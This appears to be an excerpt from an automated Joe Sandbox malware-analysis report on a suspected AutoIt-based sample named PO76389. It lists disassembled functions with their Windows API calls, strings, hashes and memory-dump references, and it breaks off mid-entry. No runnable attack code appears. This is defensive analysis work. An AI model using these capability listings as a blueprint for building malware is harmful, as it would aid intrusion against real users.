                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 1423608774-0
                                                    • Opcode ID: cc3c6f4330e36a12422ea5860b5c39d37db96bc74a80d7b447c7a0fe57bc644a
                                                    • Instruction ID: e5af3f3d1eccd9252beb3514e50087bb7a147719f5f28b53d674b444643fd806
                                                    • Opcode Fuzzy Hash: cc3c6f4330e36a12422ea5860b5c39d37db96bc74a80d7b447c7a0fe57bc644a
                                                    • Instruction Fuzzy Hash: 3F01F9761012159BD7152B54FC48DFBB776FF59301700052AFA0792260CB74AC14DB61
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004B1898
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 004B18A0
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004B18AB
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004B18B6
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 004B18BE
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004B18C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: 37449b365679fb0926d64a34477de70dd44fc7e06fe03c2ce4daff86b50149f8
                                                    • Instruction ID: dab4e6bba6ad073db6e0bc42772693b029317f766cc0b456d81076a8fd9c5155
                                                    • Opcode Fuzzy Hash: 37449b365679fb0926d64a34477de70dd44fc7e06fe03c2ce4daff86b50149f8
                                                    • Instruction Fuzzy Hash: 09016CB0901B597DE3008F6A8C85B52FFB8FF15354F04411B915C47A41C7F5A864CBE5
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004F8504
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004F851A
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 004F8529
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8538
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8542
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004F8549
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: 070704dd32d6ba8fb764eb252cfeba4192b03965df8cfbe03078d2f69277066f
                                                    • Instruction ID: 29225a68037304532811a78286e30ed20094f5348ed589a5a37894d160535df9
                                                    • Opcode Fuzzy Hash: 070704dd32d6ba8fb764eb252cfeba4192b03965df8cfbe03078d2f69277066f
                                                    • Instruction Fuzzy Hash: DFF0BE32200158BBE7201B62AC0EEEF7E7CDFE6B11F000018FA01D1250EBA06A09E6B4
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 004FA330
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 004FA341
                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA34E
                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004FA35B
                                                      • Part of subcall function 004F9CCE: CloseHandle.KERNEL32(?,?,004FA368,?,?,?,005266D3,?,?,?,?,?,004BE681), ref: 004F9CD8
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 004FA36E
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 004FA375
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: b3fa0926ba233c8f6cbdfb06915a4bfc87635ccb0f2e19dc67f1af1da76d21cb
                                                    • Instruction ID: 2413207ee8637f8336f16a36bee479fd485180b67c327739f2c98a5271fdeaf3
                                                    • Opcode Fuzzy Hash: b3fa0926ba233c8f6cbdfb06915a4bfc87635ccb0f2e19dc67f1af1da76d21cb
                                                    • Instruction Fuzzy Hash: 5BF08976145215ABD3112B64FD4CDEBB77BFF55301B000521FA03912A1CB755815EB71
                                                    APIs
                                                    • _memmove.LIBCMT ref: 004BC419
                                                    • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,004F6653,?,?,00000000), ref: 004BC495
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FileRead_memmove
                                                    • String ID: SfO
                                                    • API String ID: 1325644223-1149229531
                                                    • Opcode ID: ab8443c22366b1d2684d3e5e5e6d961070f8e935a466c35f4ead9f7a762bb80f
                                                    • Instruction ID: f13fd6abbf2022f4faf713f41a20b1db4ebce1c94d5b51575a03521906de8a94
                                                    • Opcode Fuzzy Hash: ab8443c22366b1d2684d3e5e5e6d961070f8e935a466c35f4ead9f7a762bb80f
                                                    • Instruction Fuzzy Hash: 47A1CE70A04619EBDB00CF59D8C0BAAFBB0FF05300F14C59AE8659B381D739D965DBA5
                                                    APIs
                                                      • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                      • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                      • Part of subcall function 004BBBD9: _memmove.LIBCMT ref: 004BBC33
                                                    • __swprintf.LIBCMT ref: 004CD98F
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 004CD832
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 1943609520-557222456
                                                    • Opcode ID: 66e439e48895b150b64c63075ef4f1dfc03ef1422df0d67dcb8f66ef96b2a4f6
                                                    • Instruction ID: e107f787fe5b47c558d8005ff6e03de02e0fa0af6a2107b762cb30b3f504bc67
                                                    • Opcode Fuzzy Hash: 66e439e48895b150b64c63075ef4f1dfc03ef1422df0d67dcb8f66ef96b2a4f6
                                                    • Instruction Fuzzy Hash: BF919E75508211AFC754EF25D881DAEBBB4FF85704F00092EF496972A1EB38ED05CB6A
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0050B4A8
                                                    • CharUpperBuffW.USER32(?,?), ref: 0050B5B7
                                                    • VariantClear.OLEAUT32(?), ref: 0050B73A
                                                      • Part of subcall function 004FA6F6: VariantInit.OLEAUT32(00000000), ref: 004FA736
                                                      • Part of subcall function 004FA6F6: VariantCopy.OLEAUT32(?,?), ref: 004FA73F
                                                      • Part of subcall function 004FA6F6: VariantClear.OLEAUT32(?), ref: 004FA74B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: 4ca0b44bdb90ab12a53c3f127b0f1e90e171d319f182bec04d4d2747e76b2c1b
                                                    • Instruction ID: 44f2ed44509efe4cec79acdf4137cab55e9d2451f82f8675e6fe2cce65e39033
                                                    • Opcode Fuzzy Hash: 4ca0b44bdb90ab12a53c3f127b0f1e90e171d319f182bec04d4d2747e76b2c1b
                                                    • Instruction Fuzzy Hash: EA9159746043019FCB10DF25C484A5ABBF4BF89704F14496EF88A9B391EB35E945CB62
                                                    APIs
                                                      • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                    • _memset.LIBCMT ref: 004F5E56
                                                    • GetMenuItemInfoW.USER32(?), ref: 004F5E85
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004F5F31
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004F5F5B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: de0dbe5d9f8b794e60b113aca646148dd89679d984d5ee75d6c7f0eceec96780
                                                    • Instruction ID: 6fff779fb20fdde316156a9e73501f57fea48bdd1aa141f9aa4e063f1eb6c07b
                                                    • Opcode Fuzzy Hash: de0dbe5d9f8b794e60b113aca646148dd89679d984d5ee75d6c7f0eceec96780
                                                    • Instruction Fuzzy Hash: 8F510331518B099BD3149B28D8446BBB7E4EF85314F08062FFB95D32D1DB78CD0587AA
                                                    APIs
                                                    • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 004F10B8
                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004F10EE
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004F10FF
                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004F1181
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: DllGetClassObject
                                                    • API String ID: 753597075-1075368562
                                                    • Opcode ID: 8076bd471c13b951411ccdee5844508d2b6e5202704e9fef0f6b4be31fec67a3
                                                    • Instruction ID: 36417bec39e57643088f3ff22c0e9180c0a1f2f3b90f6687828b719dc71d90d7
                                                    • Opcode Fuzzy Hash: 8076bd471c13b951411ccdee5844508d2b6e5202704e9fef0f6b4be31fec67a3
                                                    • Instruction Fuzzy Hash: 81418B71600208EFDB05CF55C984AAB7BB9EF48354F1480AAEB09DF225D7B9DD44CBA4
                                                    APIs
                                                    • _memset.LIBCMT ref: 004F5A93
                                                    • GetMenuItemInfoW.USER32 ref: 004F5AAF
                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 004F5AF5
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005718F0,00000000), ref: 004F5B3E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: 919001753ee585c458ef1c4397475f8c7ae089b2ebaa1be60314e422c8538d07
                                                    • Instruction ID: e130b0369a2f427a6ec13fa7741e861c40b61ea5f5965bfc9a0d720fa5f6f215
                                                    • Opcode Fuzzy Hash: 919001753ee585c458ef1c4397475f8c7ae089b2ebaa1be60314e422c8538d07
                                                    • Instruction Fuzzy Hash: 3441AF71608705AFDB109F24D884B6AB7E4EF88314F04465EFBA59B3D1D778A804CB6A
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00510478
                                                      • Part of subcall function 004B7F40: _memmove.LIBCMT ref: 004B7F8F
                                                      • Part of subcall function 004BA2FB: _memmove.LIBCMT ref: 004BA33D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove$BuffCharLower
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 2411302734-567219261
                                                    • Opcode ID: 07360e70038270d79e27682beb4c5a626684f9ee06da3e2ba9b38abf5b92cb2e
                                                    • Instruction ID: 8f153bd4a2ba0b4c4da141c9767608cfa02d214cb18474d7b5430cc94944c937
                                                    • Opcode Fuzzy Hash: 07360e70038270d79e27682beb4c5a626684f9ee06da3e2ba9b38abf5b92cb2e
                                                    • Instruction Fuzzy Hash: 0831E434500609AFCF00EF59C840AEEBBB6FF14354B108A2EE422972D1DB75E985CF50
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004EC684
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004EC697
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 004EC6C7
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 458670788-1403004172
                                                    • Opcode ID: 5376d4c0137e30c7b74e4e3d715275719ff228152eadae885b98b37a7cc8656b
                                                    • Instruction ID: a6bf07e5a8dc0b60a1af7977dc15af940184e4939521d7a7822ab23b9a60cf6d
                                                    • Opcode Fuzzy Hash: 5376d4c0137e30c7b74e4e3d715275719ff228152eadae885b98b37a7cc8656b
                                                    • Instruction Fuzzy Hash: 4421E471900144AEDB149B76C886EFFBB79DF55315F10451BF421E32E0DB7D4D0AA628
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00504A60
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00504A86
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00504AB6
                                                    • InternetCloseHandle.WININET(00000000), ref: 00504AFD
                                                      • Part of subcall function 005056A9: GetLastError.KERNEL32(?,?,00504A2B,00000000,00000000,00000001), ref: 005056BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 1951874230-3916222277
                                                    • Opcode ID: 92487abb27da848cd850677aff8598f2cdac8ba8926989ad2e516668364ef396
                                                    • Instruction ID: f05dd4c942cbc71359a5f3061331a873a57061654382806d8f4fd3eb51f8bd44
                                                    • Opcode Fuzzy Hash: 92487abb27da848cd850677aff8598f2cdac8ba8926989ad2e516668364ef396
                                                    • Instruction Fuzzy Hash: 2221CFB5640208BFEB11DFA59C89EBFBAFDFB88744F10401AF605D2280EA749D059B74
                                                    APIs
                                                      • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                      • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                      • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00518F69
                                                    • LoadLibraryW.KERNEL32(?), ref: 00518F70
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00518F85
                                                    • DestroyWindow.USER32(?), ref: 00518F8D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: 9ac7d2c5eac7a44d62e7cc9adf10d64fb52ab91f9b45efb7c869d5d1ace32e36
                                                    • Instruction ID: 6c69461c21db6b75df431851a80f8d664bbfd13a0dcd1fd919c69f47df88928c
                                                    • Opcode Fuzzy Hash: 9ac7d2c5eac7a44d62e7cc9adf10d64fb52ab91f9b45efb7c869d5d1ace32e36
                                                    • Instruction Fuzzy Hash: F3219D71600205AFFF204E64EC85EFB3BAEFB59364F104629FA2497190DB71DC92A760
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 004FE392
                                                    • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 004FE3E6
                                                    • __swprintf.LIBCMT ref: 004FE3FF
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0054DBF0), ref: 004FE43D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
